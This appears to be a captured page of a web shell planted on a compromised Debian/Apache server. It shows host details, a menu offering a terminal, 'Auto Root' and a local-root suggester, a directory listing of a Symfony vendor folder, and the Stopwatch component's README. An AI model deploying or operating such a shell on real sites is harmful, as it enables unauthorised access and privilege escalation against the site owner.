Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
stopwatch /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
595
B
-rwxrwxr-x
2025-07-10 08:14
LICENSE
1.04
KB
-rwxrwxr-x
2025-07-10 08:14
README.md
925
B
-rwxrwxr-x
2025-07-10 08:14
Section.php
3.68
KB
-rwxrwxr-x
2025-07-10 08:14
Stopwatch.php
3.86
KB
-rwxrwxr-x
2025-07-10 08:14
StopwatchEvent.php
5.15
KB
-rwxrwxr-x
2025-07-10 08:14
StopwatchPeriod.php
1.88
KB
-rwxrwxr-x
2025-07-10 08:14
composer.json
719
B
-rwxrwxr-x
2025-07-10 08:14
Save
Rename
Stopwatch Component =================== The Stopwatch component provides a way to profile code. Getting Started --------------- ``` $ composer require symfony/stopwatch ``` ```php use Symfony\Component\Stopwatch\Stopwatch; $stopwatch = new Stopwatch(); // optionally group events into sections (e.g. phases of the execution) $stopwatch->openSection(); // starts event named 'eventName' $stopwatch->start('eventName'); // ... run your code here // optionally, start a new "lap" time $stopwatch->lap('foo'); // ... run your code here $event = $stopwatch->stop('eventName'); $stopwatch->stopSection('phase_1'); ``` Resources --------- * [Contributing](https://symfony.com/doc/current/contributing/index.html) * [Report issues](https://github.com/symfony/symfony/issues) and [send Pull Requests](https://github.com/symfony/symfony/pulls) in the [main Symfony repository](https://github.com/symfony/symfony)